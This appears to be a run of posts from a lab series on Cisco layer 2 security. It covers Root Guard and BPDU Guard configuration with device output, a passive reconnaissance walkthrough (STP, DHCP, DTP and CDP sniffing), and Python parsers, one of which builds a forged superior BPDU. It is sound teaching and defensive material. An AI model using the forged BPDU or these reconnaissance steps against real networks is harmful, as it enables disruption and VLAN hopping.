soon as no more illegal <abbr title="Bridge Protocol Data Units">BPDUs</abbr> are received on the port.</p>
</li>
</ul>
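<p>To make the difference between the two guards concrete, here is an added example (not code from the original post) that parses 802.1D configuration and <span class="caps">TCN</span> <abbr title="Bridge Protocol Data Units">BPDUs</abbr> and applies each guard’s decision rule: <abbr title="Bridge Protocol Data Unit"><span class="caps">BPDU</span></abbr> Guard err-disables on any <abbr title="Bridge Protocol Data Unit"><span class="caps">BPDU</span></abbr>, Root Guard only on one whose root ID beats the current root (lower priority, then lower <span class="caps">MAC</span>). The lab root’s priority 24577 and address <code>aabb.cc00.0400</code> are those of <em>IOU1</em> in the <code>show spanning-tree</code> output further down; the attacker’s bridge ID and the timer values are constructed.</p>

```python
"""802.1D BPDU parser plus the Root Guard and BPDU Guard decision rules.

Added example, not code from the original post.  Wire layout follows IEEE
802.1D (LLC header 42 42 03, then the BPDU); the attacker's bridge ID and
the timers are constructed, the lab root's values come from the post.
"""
import struct
from dataclasses import dataclass

LLC_STP = b"\x42\x42\x03"       # DSAP 0x42, SSAP 0x42, UI control field
BPDU_TYPE_CONFIG = 0x00
BPDU_TYPE_TCN = 0x80
# flags, root ID, root path cost, bridge ID, port ID, message age, max age,
# hello time, forward delay (timers are in 1/256 s units on the wire)
CONFIG_FMT = "!B8sI8sHHHHH"


@dataclass(frozen=True)
class BridgeId:
    priority: int    # 4-bit priority * 4096 + 12-bit sys-id-ext (the VLAN under PVST)
    mac: bytes

    @classmethod
    def from_bytes(cls, raw):
        return cls(struct.unpack("!H", raw[:2])[0], raw[2:8])

    def to_bytes(self):
        return struct.pack("!H", self.priority) + self.mac

    def is_better_than(self, other):
        """The election picks the numerically lowest (priority, MAC) pair."""
        return (self.priority, self.mac) < (other.priority, other.mac)


@dataclass(frozen=True)
class ConfigBpdu:
    root: BridgeId
    root_path_cost: int
    bridge: BridgeId
    port_id: int
    message_age: int
    max_age: int
    hello_time: int
    forward_delay: int
    flags: int = 0


def build_config_bpdu(b):
    header = struct.pack("!HBB", 0, 0, BPDU_TYPE_CONFIG)   # protocol ID, version, type
    body = struct.pack(CONFIG_FMT, b.flags, b.root.to_bytes(), b.root_path_cost,
                       b.bridge.to_bytes(), b.port_id, b.message_age, b.max_age,
                       b.hello_time, b.forward_delay)
    return LLC_STP + header + body


def build_tcn_bpdu():
    return LLC_STP + struct.pack("!HBB", 0, 0, BPDU_TYPE_TCN)


def parse_bpdu(payload):
    """Return ('tcn', None) or ('config', ConfigBpdu); raise on anything else."""
    if not payload.startswith(LLC_STP):
        raise ValueError("not an STP LLC frame")
    proto_id, _version, bpdu_type = struct.unpack("!HBB", payload[3:7])
    if proto_id != 0:
        raise ValueError("unknown protocol identifier %#x" % proto_id)
    if bpdu_type == BPDU_TYPE_TCN:
        return "tcn", None
    if bpdu_type != BPDU_TYPE_CONFIG:
        raise ValueError("unsupported BPDU type %#x" % bpdu_type)
    flags, root, cost, bridge, port, age, max_age, hello, fwd = struct.unpack(
        CONFIG_FMT, payload[7:7 + struct.calcsize(CONFIG_FMT)])
    return "config", ConfigBpdu(BridgeId.from_bytes(root), cost, BridgeId.from_bytes(bridge),
                                port, age, max_age, hello, fwd, flags)


def root_guard_verdict(current_root, payload):
    """Root Guard only reacts to a BPDU announcing a better root than the current one."""
    kind, bpdu = parse_bpdu(payload)
    if kind == "config" and bpdu.root.is_better_than(current_root):
        return "root-inconsistent"    # blocked until the superior BPDUs stop
    return "forward"


def bpdu_guard_verdict(payload):
    """BPDU Guard ignores the content: any valid BPDU err-disables the port."""
    parse_bpdu(payload)
    return "err-disabled"


# Lab root from the `show spanning-tree` output (priority 24576 + VLAN 1);
# the attacker's bridge ID (priority 0 + VLAN 1, made-up MAC) is constructed.
LAB_ROOT = BridgeId(24577, bytes.fromhex("aabbcc000400"))
ATTACKER = BridgeId(1, bytes.fromhex("020000000001"))
TIMERS = dict(message_age=0, max_age=20 * 256, hello_time=2 * 256, forward_delay=15 * 256)
LEGIT_BPDU = build_config_bpdu(ConfigBpdu(LAB_ROOT, 0, LAB_ROOT, 0x8001, **TIMERS))
ATTACKER_BPDU = build_config_bpdu(ConfigBpdu(ATTACKER, 0, ATTACKER, 0x8001, **TIMERS))

if __name__ == "__main__":
    for name, frame in (("legitimate", LEGIT_BPDU), ("attacker", ATTACKER_BPDU), ("tcn", build_tcn_bpdu())):
        print(name, "root-guard:", root_guard_verdict(LAB_ROOT, frame), "bpdu-guard:", bpdu_guard_verdict(frame))
```

<p>Note the asymmetry the rules expose: a <span class="caps">TCN</span> or a <abbr title="Bridge Protocol Data Unit"><span class="caps">BPDU</span></abbr> carrying an inferior root passes a Root Guard port untouched but still err-disables a <abbr title="Bridge Protocol Data Unit"><span class="caps">BPDU</span></abbr> Guard port, and a same-priority bridge with a lower <span class="caps">MAC</span> is enough to win the election, which is why the root’s priority should be set well below the default rather than relying on the address tie-break.</p>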
<p>Root Guard can be enabled in various positions in the topology:</p>
<ul>
<li>
<p>It can be enabled on the access layer switches to ensure that access ports
are not used to maliciously trigger a topology change.
However, <abbr title="Bridge Protocol Data Unit"><span class="caps">BPDU</span></abbr> Guard might be more appropriate here.</p>
</li>
<li>
<p>It can be enabled on intermediate bridges; this may be useful in case of
shared administrative control.</p>
</li>
<li>
<p>If you have a fixed root bridge you can apply Root Guard directly to it.
This is what we will do in our lab topology.</p>
</li>
</ul>
<p>Root Guard can be applied on distribution layer switches while applying <abbr title="Bridge Protocol Data Unit"><span class="caps">BPDU</span></abbr>
guard on access layer switches.
This provides a layered security approach both against malicious and
inadvertent actions which would result in a <abbr title="Spanning Tree Protocol"><span class="caps">STP</span></abbr> topology change.</p>
<div class="admonition warning">
<p class="admonition-title">Warning</p>
<p>A violation of the Root Guard policy results in the port being temporarily
set to the “root-inconsistent” state, not forwarding any frame.
Measure any impact this may have in terms of potential networking outages.
In particular, don’t enable it on your infrastructure switches without
properly enabling <abbr title="Bridge Protocol Data Unit"><span class="caps">BPDU</span></abbr> Guard at the access layer, otherwise in an attacker’s hands
Root Guard becomes a perfect <abbr title="Denial-Of-Service"><span class="caps">DOS</span></abbr> tool: a superior <abbr title="Bridge Protocol Data Unit"><span class="caps">BPDU</span></abbr> injected on an
unprotected access port is relayed by the access switch and blocks the
distribution switch’s port facing that access switch, cutting off the whole
access switch instead of the attacker’s port alone.</p>
</div>
<p>Here we enable Root Guard on all ports of the legitimate <abbr title="Spanning Tree Protocol"><span class="caps">STP</span></abbr> root:</p>
<div class="codehilite"><pre><span class="gp">IOU1#</span><span class="k">conf</span> t
<span class="go">Enter configuration commands, one per line. End with CNTL/Z.</span>
<span class="gp">IOU1(config)#</span><span class="k">interface</span> range<span class="s"> ethernet 0/0 - 3, ethernet 1/0 - 3</span>
<span class="hll"><span class="gp">IOU1(config-if-range)#</span><span class="k">spanning-tree</span> guard root
</span><span class="gp">IOU1(config-if-range)#</span>
<span class="gt">*Oct 16 11:26:22.214: %SPANTREE-2-ROOTGUARD_CONFIG_CHANGE: Root guard enabled on port Ethernet0/0.</span>
<span class="gt">*Oct 16 11:26:22.215: %SPANTREE-2-ROOTGUARD_CONFIG_CHANGE: Root guard enabled on port Ethernet0/1.</span>
<span class="gt">*Oct 16 11:26:22.215: %SPANTREE-2-ROOTGUARD_CONFIG_CHANGE: Root guard enabled on port Ethernet0/2.</span>
<span class="gt">*Oct 16 11:26:22.215: %SPANTREE-2-ROOTGUARD_CONFIG_CHANGE: Root guard enabled on port Ethernet0/3.</span>
<span class="gt">*Oct 16 11:26:22.215: %SPANTREE-2-ROOTGUARD_CONFIG_CHANGE: Root guard enabled on port Ethernet1/0.</span>
<span class="gt">*Oct 16 11:26:22.215: %SPANTREE-2-ROOTGUARD_CONFIG_CHANGE: Root guard enabled on port Ethernet1/1.</span>
<span class="gp">IOU1(config-if-range)#</span>
<span class="gt">*Oct 16 11:26:22.216: %SPANTREE-2-ROOTGUARD_CONFIG_CHANGE: Root guard enabled on port Ethernet1/2.</span>
<span class="gt">*Oct 16 11:26:22.216: %SPANTREE-2-ROOTGUARD_CONFIG_CHANGE: Root guard enabled on port Ethernet1/3.</span>
<span class="gp">IOU1(config-if-range)#</span><span class="nb">end</span>
<span class="gp">IOU1#</span>
<span class="gt">*Oct 16 11:26:40.887: %SYS-5-CONFIG_I: Configured from console by console</span>
<span class="gp">IOU1#</span><span class="k">copy</span> running-config startup-config
<span class="go">Destination filename [startup-config]?</span>
<span class="go">Building configuration...</span>
<span class="go">Compressed configuration from 2110 bytes to 1160 bytes[OK]</span>
<span class="gp">IOU1#</span>
</pre></div>
<div class="admonition note">
<p class="admonition-title">Note</p>
<p>To disable Root Guard, use the command <code>spanning-tree guard none</code>.</p>
</div>
<p>Reproducing the attack now turns the affected port into the root-inconsistent state
and has no effect anymore on <em>User_1</em> connectivity, while isolating the
offender’s network until the end of the attack (for the sake of the exercise,
ensure that <abbr title="Bridge Protocol Data Unit"><span class="caps">BPDU</span></abbr> Guard is disabled when you try this!):</p>
<div class="codehilite"><pre><span class="gp">IOU1#</span>
<span class="gt">*Oct 16 11:30:45.588: %SPANTREE-2-ROOTGUARD_BLOCK: Root guard blocking port Ethernet1/1 on VLAN0001.</span>
<span class="gp">IOU1#</span>
<span class="gp">IOU1#</span><span class="k">show</span> spanning-tree vlan <span class="s">1</span>
<span class="go">VLAN0001</span>
<span class="go">Spanning tree enabled protocol ieee</span>
<span class="go">Root ID Priority 24577</span>
<span class="go"> Address aabb.cc00.0400</span>
<span class="go"> This bridge is the root</span>
<span class="go"> Hello Time 2 sec Max Age 20 sec Forward Delay 15 sec</span>
<span class="go">Bridge ID Priority 24577 (priority 24576 sys-id-ext 1)</span>
<span class="go"> Address aabb.cc00.0400</span>
<span class="go"> Hello Time 2 sec Max Age 20 sec Forward Delay 15 sec</span>
<span class="go"> Aging Time 300 sec</span>
<span class="go">Interface Role Sts Cost Prio.Nbr Type</span>
<span class="go">------------------- ---- --- --------- -------- --------------------------------</span>
<span class="go">Et0/0 Desg FWD 100 128.1 Shr</span>
<span class="go">Et0/1 Desg FWD 100 128.2 Shr</span>
<span class="go">Et0/2 Desg FWD 100 128.3 Shr</span>
<span class="go">Et0/3 Desg FWD 100 128.4 Shr</span>
<span class="go">Et1/0 Desg FWD 100 128.5 Shr</span>
<span class="hll"><span class="go">Et1/1 Desg BKN*100 128.6 Shr *ROOT_Inc</span>
</span><span class="go">Et1/2 Desg FWD 100 128.7 Shr</span>
<span class="go">Et1/3 Desg FWD 100 128.8 Shr</span>
<span class="gp">IOU1#</span>
</pre></div>
<p>Unlike with <abbr title="Bridge Protocol Data Unit"><span class="caps">BPDU</span></abbr> Guard, simply stopping the attack automatically restores the connectivity:</p>
<div class="codehilite"><pre><span class="gp">IOU1#</span>
<span class="gt">*Oct 16 11:40:40.657: %SPANTREE-2-ROOTGUARD_UNBLOCK: Root guard unblocking port Ethernet1/1 on VLAN0001.</span>
<span class="gp">IOU1#</span>
</pre></div>Practical network layer 2 exploitation: passive reconnaissance2017-10-12T00:00:00+02:002017-10-12T00:00:00+02:00WhiteWinterWolftag:www.whitewinterwolf.com,2017-10-12:/posts/2017/10/12/practical-network-layer-2-exploitation-passive-reconnaissance/<p>This post is part of a series about <a href="/tags/lab/#practical-network-layer-2-exploitation" title="Lab: Practical network layer 2 exploitation">practical network layer 2 exploitation</a>.</p>
<p>Now is the time to change your network administrator hat for the attacker one.
Your own, known network now becomes an unfamiliar target.</p>
<p>Before rushing and banging against the nearest devices, it may be wiser to just
stand back and listen.</p>
<p>On switched networks, users are somewhat isolated from each other thanks to the
separation of collision domains.
All that remains is some kind of white noise… but this white noise in itself can
bring invaluable information to an attacker!</p>
<p>In particular we will see how, simply by passively listening to this white
noise, an attacker will be able to detect several weaknesses affecting the
network and plan his next steps.</p>
<p>In this lab no interaction will occur with either the <em>Admins</em> or the <em>Servers</em>
<abbr title="Virtual Local Area Networks">VLANs</abbr>, the <em>User_1</em> workstation will be required only for the
<a href="#dhcp-discover-messages"><abbr title="Dynamic Host Configuration Protocol"><span class="caps">DHCP</span></abbr> Discover messages</a> part:</p>
<p><span class="lb-small"><a href="#topology.png" id="topology.png-thumb" title="Click to enlarge"><img alt="passive reconnaissance lab topology" src="https://www.whitewinterwolf.com/posts/2017/10/12/practical-network-layer-2-exploitation-passive-reconnaissance/topology.png"/></a></span></p>
<h3 id="stp-messages"><a class="toclink" href="#stp-messages"><abbr title="Spanning Tree Protocol"><span class="caps">STP</span></abbr> messages</a></h3>
<table class="floatright">
<thead>
<tr><th>Lab</th><th>Compatible</th></tr>
</thead>
<tbody>
<tr><td>Dynamips</td><td class="yes" title="Yes"><span class="sr-only">Yes</span></td></tr>
<tr><td><span class="caps">IOU</span></td><td class="yes" title="Yes"><span class="sr-only">Yes</span></td></tr>
<tr><td>Real gear</td><td class="yes" title="Yes"><span class="sr-only">Yes</span></td></tr>
</tbody>
</table>
<p>Now is the time to open a session on the <em>Attacker</em> host and fire-up
<a href="https://www.wireshark.org/" rel="external" title="Wireshark project homepage">Wireshark</a>.
As with most tools we will use in this post series, it requires raw access to
the network interfaces and must therefore be run as root: this is not a problem
on some distributions like Kali where the whole desktop session runs as
root; on others you may need to start Wireshark through <code>sudo wireshark</code>.</p>
<p>Once Wireshark is up and listening on your main network interface in
promiscuous mode, you should already start to see mostly light-grey packets
regularly accumulating as the “white noise” mentioned earlier.</p>
<p>Most of these messages are <abbr title="Spanning Tree Protocol"><span class="caps">STP</span></abbr> messages, sent every few seconds by the
nearby switch:</p>
<p><span class="lb-small"><a href="#stp.png" id="stp.png-thumb" title="Click to enlarge"><img alt="STP messages" src="https://www.whitewinterwolf.com/posts/2017/10/12/practical-network-layer-2-exploitation-passive-reconnaissance/stp.png"/></a></span></p>
<p>These messages are sent in case we add another switch on our end
(in sane networks they should not be sent on access ports).
They are used to detect topology loops and build the most efficient forwarding
path between connected switches.</p>
<p>The presence of these messages means that we can start discussing with the
switch using the <abbr title="Spanning Tree Protocol"><span class="caps">STP</span></abbr> protocol, potentially inducing changes to the whole
spanning tree.</p>
<p>By itself, this ability won’t allow us to mount any really profitable attack
against the network.
However, in some cases it can provide valuable support to make other
attacks more effective:</p>
<ul>
<li>
<p>The attacker can become root of the <abbr title="Spanning Tree Protocol"><span class="caps">STP</span></abbr> tree, making the propagation of
malicious packets throughout the switched network more efficient.</p>
</li>
<li>
<p>The attacker can cause a temporary but renewable <abbr title="Denial of Service">DoS</abbr> disrupting
communication over the whole switched network or over a single <abbr title="Virtual Local Area Network"><span class="caps">VLAN</span></abbr>, depending
on whether the switches run a single spanning tree or one per <abbr title="Virtual Local Area Network"><span class="caps">VLAN</span></abbr> (<abbr title="Per VLAN Spanning Tree"><span class="caps">PVST</span></abbr>).
This can be used as:</p>
<ul>
<li>
<p>A part of a social engineering attack.
For instance a fake <span class="caps">IT</span> support guy calling an employee, notifying about
current network outages <em>“which have been detected”</em> and collecting
sensitive information <em>“for troubleshooting purposes”</em>.</p>
</li>
<li>
<p>A brutal way to paralyze a <abbr title="Virtual Local Area Network"><span class="caps">VLAN</span></abbr> or a network, for instance to
disrupt network and system management services while the actual attack
is going on.</p>
</li>
</ul>
</li>
</ul>
<h3 id="dhcp-discover-messages"><a class="toclink" href="#dhcp-discover-messages"><abbr title="Dynamic Host Configuration Protocol"><span class="caps">DHCP</span></abbr> Discover messages</a></h3>
<table class="floatright">
<thead>
<tr><th>Lab</th><th>Compatible</th></tr>
</thead>
<tbody>
<tr><td>Dynamips</td><td class="yes" title="Yes"><span class="sr-only">Yes</span></td></tr>
<tr><td><span class="caps">IOU</span></td><td class="yes" title="Yes"><span class="sr-only">Yes</span></td></tr>
<tr><td>Real gear</td><td class="yes" title="Yes"><span class="sr-only">Yes</span></td></tr>
</tbody>
</table>
<p>Start or restart the <em>User_1</em> host.
You should eventually see, among other things, a <abbr title="Dynamic Host Configuration Protocol"><span class="caps">DHCP</span></abbr> Discover message popping
up in your Wireshark:</p>
<p><span class="lb-small"><a href="#dhcp-discover.png" id="dhcp-discover.png-thumb" title="Click to enlarge"><img alt="DHCP Discover" src="https://www.whitewinterwolf.com/posts/2017/10/12/practical-network-layer-2-exploitation-passive-reconnaissance/dhcp-discover.png"/></a></span></p>
<p>This is a good thing (from an attacker perspective) as this means that <abbr title="Dynamic Host Configuration Protocol"><span class="caps">DHCP</span></abbr>
snooping has not been enabled in the switches you are facing.
This gives the attacker the ability to build a rogue <abbr title="Dynamic Host Configuration Protocol"><span class="caps">DHCP</span></abbr> server, distributing
malicious <abbr title="Dynamic Host Configuration Protocol"><span class="caps">DHCP</span></abbr> replies and opening the way to various <abbr title="Man-In-The-Middle"><span class="caps">MITM</span></abbr> attacks.</p>
<p>You can also take this occasion to note-down the <abbr title="Media Access Control"><span class="caps">MAC</span></abbr> address of the <em>User_1</em>
machine which appears as the message’s source (<em>Ethernet <span class="caps">II</span>, Src</em> field) address.</p>
<h3 id="dtp-messages"><a class="toclink" href="#dtp-messages"><abbr title="Dynamic Trunking Protocol"><span class="caps">DTP</span></abbr> messages</a></h3>
<table class="floatright">
<thead>
<tr><th>Lab</th><th>Compatible</th></tr>
</thead>
<tbody>
<tr><td>Dynamips</td><td class="no" title="No"><span class="sr-only">No</span></td></tr>
<tr><td><span class="caps">IOU</span></td><td class="yes" title="Yes"><span class="sr-only">Yes</span></td></tr>
<tr><td>Real gear</td><td class="yes" title="Yes"><span class="sr-only">Yes</span></td></tr>
</tbody>
</table>
<p>About every minute, you may encounter a <abbr title="Dynamic Trunking Protocol"><span class="caps">DTP</span></abbr> message:</p>
<p><span class="lb-small"><a href="#dtp.png" id="dtp.png-thumb" title="Click to enlarge"><img alt="DTP messages" src="https://www.whitewinterwolf.com/posts/2017/10/12/practical-network-layer-2-exploitation-passive-reconnaissance/dtp.png"/></a></span></p>
<p>This is your lucky day.</p>
<p>This protocol allows plug-and-play auto-configuration of Cisco switches.</p>
<p>At the very least, from a purely passive perspective we can see that <abbr title="Dynamic Trunking Protocol"><span class="caps">DTP</span></abbr> packets
disclose a lot of information regarding the switch configuration, including the
<abbr title="VLAN Trunk Protocol"><span class="caps">VTP</span></abbr> domain name, the native <abbr title="Virtual Local Area Network"><span class="caps">VLAN</span></abbr> number and the switch port status.</p>
<p>But above all, this opens the most devastating attack we will see in this
series as actively engaging in the <abbr title="Dynamic Trunking Protocol"><span class="caps">DTP</span></abbr> communication opens the way to <abbr title="Virtual Local Area Network"><span class="caps">VLAN</span></abbr> hopping.</p>
<div class="admonition note">
<p class="admonition-title">Note</p>
<p>The <abbr title="Dynamic Trunking Protocol"><span class="caps">DTP</span></abbr> packets, as the <abbr title="Cisco Discovery Protocol"><span class="caps">CDP</span></abbr> ones we will see <a href="#cdp-messages">below</a>, leak
the native <abbr title="Virtual Local Area Network"><span class="caps">VLAN</span></abbr> information which happens to be the same as the <em>Users</em>
<abbr title="Virtual Local Area Network"><span class="caps">VLAN</span></abbr> in our lab where the attacker is located.</p>
<p>This is usually documented as a security weakness also allowing <abbr title="Virtual Local Area Network"><span class="caps">VLAN</span></abbr>
hopping through <a href="https://en.wikipedia.org/wiki/VLAN_hopping#Double_tagging" rel="external" title="VLAN hopping: double-tagging (Wikipedia)">double-tagging</a>, however Cisco switches do not seem
vulnerable to this attack as they correctly drop 802.1Q packets coming on
non-trunk ports.</p>
<p>Moreover, even on vulnerable devices the range of this particular attack is
somewhat limited as it allows only one-way communication (still useful for
things like malicious <span class="caps">UDP</span> notifications though).
As we will see, <abbr title="Dynamic Trunking Protocol"><span class="caps">DTP</span></abbr>-based <abbr title="Virtual Local Area Network"><span class="caps">VLAN</span></abbr> hopping doesn’t have this limitation.</p>
</div>
<h3 id="cdp-messages"><a class="toclink" href="#cdp-messages"><abbr title="Cisco Discovery Protocol"><span class="caps">CDP</span></abbr> messages</a></h3>
<table class="floatright">
<thead>
<tr><th>Lab</th><th>Compatible</th></tr>
</thead>
<tbody>
<tr><td>Dynamips</td><td class="yes" title="Yes"><span class="sr-only">Yes</span></td></tr>
<tr><td><span class="caps">IOU</span></td><td class="yes" title="Yes"><span class="sr-only">Yes</span></td></tr>
<tr><td>Real gear</td><td class="yes" title="Yes"><span class="sr-only">Yes</span></td></tr>
</tbody>
</table>
<p>At last, about every minute you may also encounter a <abbr title="Cisco Discovery Protocol"><span class="caps">CDP</span></abbr> message:</p>
<p><span class="lb-small"><a href="#cdp.png" id="cdp.png-thumb" title="Click to enlarge"><img alt="CDP messages" src="https://www.whitewinterwolf.com/posts/2017/10/12/practical-network-layer-2-exploitation-passive-reconnaissance/cdp.png"/></a></span></p>
<p>These messages allow a Cisco device to share some technical details with other
directly connected devices.
This protocol is used by several Cisco proprietary features, such as:</p>
<ul>
<li>
<p>Cisco Neighbor Discovery: each device stores a table fetchable through <span class="caps">SNMP</span>
containing their neighbors information.</p>
</li>
<li>
<p>Lowering the power delivered through <abbr title="Power-over-Ethernet">PoE</abbr> ports: a Cisco device
(like an <span class="caps">IP</span> phone) can use this to inform the <abbr title="Power-over-Ethernet">PoE</abbr> switch it is connected to
that it requires only 9 W instead of the default 15.4 W, thus lowering the
switch’s overall energy consumption.
<a href="https://www.cisco.com/c/en/us/td/docs/switches/lan/catalyst3750/software/troubleshooting/g_power_over_ethernet.html?mdfid=281204560#wp1017625" rel="external" title="Cisco Discovery Protocol and PoE (Cisco)">More information</a>.</p>
</li>
<li>
<p>On-Demand Routing (<abbr title="On-Demand Routing"><span class="caps">ODR</span></abbr>): this is a Cisco proprietary intermediate solution
between static and dynamic routing.
It can be used in hub-and-spoke topologies, the spoke routers using <abbr title="Cisco Discovery Protocol"><span class="caps">CDP</span></abbr> to
notify the hub router of their ports’ <span class="caps">IP</span> address prefixes, thus allowing a
hub router with <abbr title="On-Demand Routing"><span class="caps">ODR</span></abbr> enabled to update its routing table accordingly.
<a href="https://www.youtube.com/watch?v=zgRjN7nfyXU" rel="external" title="On-Demand routing aka ODR - Cisco Router Configuration - CCNP Route (youTube)">More information</a>.</p>
<div class="admonition note">
<p class="admonition-title">Note</p>
<p>In <abbr title="On-Demand Routing"><span class="caps">ODR</span></abbr>, the “routing” communication occurs only between the spoke and
hub routers.
Unless you do lousy things such as connecting end users directly to the
infrastructure switches, it is out of an attacker’s direct reach.</p>
</div>
</li>
</ul>
<p><abbr title="Cisco Discovery Protocol"><span class="caps">CDP</span></abbr> packets are usually not directly exploitable, with one notable exception.</p>
<p>Unlike normal network traffic, which is not parsed but immediately forwarded
through <abbr title="Application-Specific Integrated Circuits">ASICs</abbr> (see <a href="/posts/2017/08/19/how-to-add-cisco-ios-based-devices-in-gns3/#how-real-gear-works" title="IOS based devices: How real gear works">here</a> for more information), the content of <abbr title="Cisco Discovery Protocol"><span class="caps">CDP</span></abbr> messages
needs to be parsed by the device’s general-purpose <span class="caps">CPU</span>.
Should a <a href="https://tools.cisco.com/security/center/viewAlert.x?alertId=29021" rel="external" title="Multiple Cisco Discovery Protocol Vulnerabilities in Cisco NX-OS-Based Products (Cisco)">bug</a> be present in the parsing software, an attacker may be
able to send specially crafted packets and execute arbitrary code on a
nearby device.</p>
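<p>As an added example (not code from this article or from Cisco), here is a small Python parser for the <abbr title="Cisco Discovery Protocol"><span class="caps">CDP</span></abbr> frames described above. It validates the 802.3 length, every TLV length and the CDP checksum before trusting anything, the discipline a parser running on the device’s CPU has to follow, and returns the fields a defender should assume are visible on every port. The frame it decodes is constructed inline: the firmware name and version are the ones quoted in this post, while the device name, MAC and address are sample values.</p>

```python
"""Parser for CDP advertisements (added example, not code from the article or from Cisco)."""
import struct
from typing import Any, Dict, List

CDP_MULTICAST = bytes.fromhex("01000ccccccc")
# LLC (DSAP/SSAP 0xAA, control 0x03) followed by SNAP (OUI 00:00:0C, protocol id 0x2000)
LLC_SNAP_CDP = bytes.fromhex("aaaa03" "00000c" "2000")
TLV_NAMES = {0x0001: "device_id", 0x0002: "addresses", 0x0003: "port_id",
             0x0005: "software_version", 0x0006: "platform",
             0x0009: "vtp_domain", 0x000A: "native_vlan"}

def cdp_checksum(data: bytes) -> int:
    """Ones'-complement checksum over the CDP payload (version byte onwards). CDP quirk:
    for an odd length the trailing byte is the low-order byte of the last 16-bit word."""
    if len(data) % 2:
        data = data[:-1] + b"\x00" + data[-1:]
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF

def _parse_addresses(value: bytes) -> List[str]:
    """Addresses TLV body: 4-byte count, then per entry: protocol type (1 byte),
    protocol length (1), protocol id, address length (2), address."""
    try:
        (count,) = struct.unpack_from("!I", value)
        off, addrs = 4, []
        for _ in range(count):
            ptype, plen = struct.unpack_from("!BB", value, off)
            proto = value[off + 2:off + 2 + plen]
            (alen,) = struct.unpack_from("!H", value, off + 2 + plen)
            raw = value[off + 4 + plen:off + 4 + plen + alen]
            off += 4 + plen + alen
            if len(proto) != plen or len(raw) != alen:
                raise ValueError
            # protocol type 1 (NLPID) with protocol id 0xCC and a 4-byte address is IPv4
            is_ipv4 = ptype == 1 and proto == b"\xcc" and alen == 4
            addrs.append(".".join(map(str, raw)) if is_ipv4 else raw.hex())
        return addrs
    except (struct.error, ValueError):
        raise ValueError("truncated Addresses TLV") from None

def parse_cdp(frame: bytes) -> Dict[str, Any]:
    """Decode an Ethernet frame carrying CDP; raise ValueError on anything malformed."""
    if len(frame) < 22 or frame[:6] != CDP_MULTICAST or frame[14:22] != LLC_SNAP_CDP:
        raise ValueError("not a CDP frame")
    (length,) = struct.unpack("!H", frame[12:14])   # 802.3 length = 8 (LLC/SNAP) + CDP payload
    payload = frame[22:14 + length]
    if len(payload) < 4 or len(payload) != length - 8 or cdp_checksum(payload) != 0:
        raise ValueError("bad 802.3 length or CDP checksum")
    info: Dict[str, Any] = {"version": payload[0], "ttl": payload[1]}
    off = 4
    while off < len(payload):
        if off + 4 > len(payload):
            raise ValueError("truncated TLV header")
        ttype, tlen = struct.unpack("!HH", payload[off:off + 4])
        # tlen includes the 4-byte header; never read past the payload on its say-so
        if tlen < 4 or off + tlen > len(payload):
            raise ValueError("bad length 0x%04x for TLV type 0x%04x" % (tlen, ttype))
        value = payload[off + 4:off + tlen]
        off += tlen
        name = TLV_NAMES.get(ttype, "tlv_%04x" % ttype)
        if ttype == 0x0002:
            info[name] = _parse_addresses(value)
        elif ttype == 0x000A and len(value) == 2:
            info[name] = struct.unpack("!H", value)[0]
        elif ttype in (0x0001, 0x0003, 0x0005, 0x0006, 0x0009):
            info[name] = value.decode("ascii", errors="replace")
        else:
            info[name] = value.hex()
    return info

def is_valid_cdp(frame: bytes) -> bool:
    """True when the frame parses cleanly: a cheap filter before acting on its content."""
    try:
        parse_cdp(frame)
        return True
    except ValueError:
        return False

def _tlv(ttype: int, value: bytes) -> bytes:
    return struct.pack("!HH", ttype, 4 + len(value)) + value

def build_sample_frame() -> bytes:
    """Constructed advertisement resembling the lab's core switch: the firmware name and
    version are those quoted in the article; device name, MAC and address are samples."""
    tlvs = (_tlv(0x0001, b"ESW1")
            + _tlv(0x0002, struct.pack("!I", 1) + b"\x01\x01\xcc"
                   + struct.pack("!H", 4) + bytes([192, 168, 1, 2]))
            + _tlv(0x0003, b"Ethernet0/0")
            + _tlv(0x0005, b"Cisco IOS Software, C3725-ADVENTERPRISEK9-M, Version 12.4(15)T10")
            + _tlv(0x0006, b"Cisco 3725")
            + _tlv(0x0009, b"WWWOLF")
            + _tlv(0x000A, struct.pack("!H", 1)))
    body = struct.pack("!BBH", 2, 180, 0) + tlvs       # version 2, TTL 180 s, checksum 0
    body = body[:2] + struct.pack("!H", cdp_checksum(body)) + body[4:]
    src_mac = bytes.fromhex("aabbcc000100")             # sample source MAC
    return CDP_MULTICAST + src_mac + struct.pack("!H", 8 + len(body)) + LLC_SNAP_CDP + body
```

Running <code>parse_cdp(build_sample_frame())</code> returns the device name, port, firmware string, platform, VTP domain, native VLAN and management address, that is, everything the bullet list below says a single advertisement gives away.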
<p>This particular attack is out of the scope of this series.
We will just note that <abbr title="Cisco Discovery Protocol"><span class="caps">CDP</span></abbr> messages are extremely verbose when it comes to
device details, providing:</p>
<ul>
<li>
<p>Detailed information on the platform and firmware version being run (here
a Cisco 3725 box running the C3725-<span class="caps">ADVENTERPRISEK9</span>-M firmware, version
12.4(15)T10, compiled Mon 14-Sep-09 15:33 by prod-rel_team).
Such information can be matched against vulnerability databases to reveal
exploitable software bugs, such as the example mentioned above.</p>
</li>
<li>
<p>Details regarding the device configuration, including interface addresses,
the <abbr title="VLAN Trunk Protocol"><span class="caps">VTP</span></abbr> domain name, the native <abbr title="Virtual Local Area Network"><span class="caps">VLAN</span></abbr> number and the device name.
Such information may be reused in other attacks or aggregated
in order to gain knowledge of the network’s general design and implementation.</p>
</li>
</ul>Practical network layer 2 exploitation: introduction2017-10-10T00:00:00+02:002017-10-10T00:00:00+02:00WhiteWinterWolftag:www.whitewinterwolf.com,2017-10-10:/posts/2017/10/10/practical-network-layer-2-exploitation-introduction/<p>This post initiates a series demonstrating network layer 2 exploitation
and protection techniques from a practical point of view.</p>
<p>This series will rely on the following topology (click to enlarge):</p>
<p><span class="lb-small"><a href="#topology.png" id="topology.png-thumb" title="Click to enlarge"><img alt="Layer 2 exploitation lab topology" src="https://www.whitewinterwolf.com/posts/2017/10/10/practical-network-layer-2-exploitation-introduction/topology.png"/></a></span></p>
<p>This topology is composed of three VLANs:</p>
<ul>
<li><em>Users</em> (<abbr title="Virtual Local Area Network"><span class="caps">VLAN</span></abbr> 1) and <em>Admins</em> (<abbr title="Virtual Local Area Network"><span class="caps">VLAN</span></abbr> 2) both contain end-user workstations;
they are isolated from each other.</li>
